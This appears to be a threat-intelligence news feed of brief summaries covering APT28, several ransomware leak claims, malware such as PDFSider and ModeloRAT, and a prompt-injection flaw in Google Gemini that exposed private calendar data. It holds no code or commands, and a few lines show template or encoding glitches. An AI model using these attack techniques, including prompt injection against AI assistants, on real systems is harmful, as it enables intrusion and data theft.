APT28 is a long-running, GRU-linked espionage group that prioritizes stealthy credential access, targeted phishing, and long-term intelligence collection across Europe, North America, and Ukraine. Recent reporting through 2025 highlights new tooling like the LAMEHUG AI-assisted malware and sustained credential/token harvesting campaigns against services such as UKR[.]net. #APT28 #LAMEHUG
Tag: SSO
The ransomware claim alleges that crypto24 has targeted Yource Bulgaria & Greece, a provider of customer experience and contact center services, resulting in potential exposure of sensitive HR, customer, financial, and project data. The impacted country is Bulgaria and Greece.
Enterprise AI adoption is accelerating, expanding security boundaries across Cloud, SaaS, and Endpoint environments and exposing a complex, AI-driven attack surface. Traditional security tools struggle to protect AI assets, making advanced AI security posture management essential for full visibility, risk assessment, data lineage, and zero-trust enforcement across the AI ecosystem. #HuggingFace #ModelContextProtocol
The 2025 State of Cloud Security Report highlights escalating challenges in cloud security, including rising data exposure, vulnerabilities, and attack paths exacerbated by AI adoption. It underscores the importance of managing neglected assets, securing Kubernetes environments, and controlling identity and access to mitigate evolving threats. #OrcaResearchPod #APT29 #Log4Shell #Spring4Shell #KubernetesSecurity #AIvulnerabilities
The VoidLink malware framework is an advanced Linux-based tool developed with significant AI assistance, likely by a single proficient developer. Its rapid development and sophisticated features demonstrate a new era of AI-driven malware creation. #VoidLink #AIDrivenMalware
North Korean threat actors have advanced their hacking tactics by exploiting malicious Visual Studio Code projects to deliver backdoors and malicious payloads. This campaign uses sophisticated multi-stage techniques, including obfuscated JavaScript and task configuration files, to compromise target systems and maintain persistence. #NorthKorea #VisualStudioCode #Backdoor #Vercel #DPRK…
A new malware family called PDFSider is being used in targeted attacks, including by multiple ransomware groups, to deploy advanced backdoors and evade detection. The malware leverages legitimate applications and sophisticated techniques like DLL sideloading and environmental checks to carry out cyberespionage and remote code execution. #PDFSider #MustangPanda #DLLSideloading #Cyberespionage…
The Qilin ransomware group has announced breaches affecting several organizations, including a Spanish engineering firm and a Taiwanese fashion supplier, by exfiltrating sensitive internal data. The stolen data comprises personal identification details, legal documents, and business records, highlighting their aggressive data theft tactics. #QilinRansomware #DataExfiltration #AltiusGeotecnia #YumarkEnterprises…
A Telegram-based illicit marketplace, Tudou Guarantee, is ceasing its major operations after processing over $12 billion in transactions, marking a significant shift in the cyber fraud landscape. Despite this, other marketplaces like HuiOne Guarantee and Xinbi Guarantee continue to operate, indicating a persistent threat environment. #TudouGuarantee #HuiOneGuarantee #XinbiGuarantee #PrinceGroup #PigButchering…
MecMatica, an Italian industrial monitoring and automation company, has been targeted by the Sarcoma ransomware group, resulting in a data breach involving 74 GB of sensitive information. The leak includes company databases, customer lists, personal identification documents, and internal files. #Sarcoma #MecMatica…
The ransomware claim warns about the negotiator “All4you” associated with the threat actor “Everest,” indicating targeted malicious activity. The affected country is unspecified, impacting #countryname.
KongTuke distributed a malicious Chrome extension (NexShield, typosquatting uBlock Origin Lite) that tracks installs via UUID beacons, delays execution, and triggers a browser denial-of-service while displaying a fake “CrashFix” popup to socially engineer victims. The campaign delivers a multi-stage infection chainβusing finger.exe as a LOLBin, multi-layer PowerShell obfuscation and DGA domains, and culminating in ModeloRAT and a GateKeeper .NET payload with AES+XOR string encryption. #KongTuke #ModeloRAT
A new malware strain called PDFSider is being used by ransomware threat actors to gain long-term access to a Fortune 100 finance company’s Windows systems. The malware employs sophisticated techniques like DLL side-loading and encrypted communication, highlighting advanced cyberattack capabilities. #PDFSider #QilinRansomware
A malicious campaign utilizing the NexShield extension crashes browsers and delivers ModeloRAT malware, targeting corporate and individual users. Researchers link the attack to the threat actor KongTuke, demonstrating evolving tactics to compromise enterprise networks. #KongTuke #ModeloRAT
Cybersecurity researchers have uncovered a vulnerability in Google Gemini that uses indirect prompt injection to bypass privacy controls and extract private calendar data. This highlights the growing security risks associated with AI-enabled features and their potential for misuse. #GoogleGemini #PromptInjection…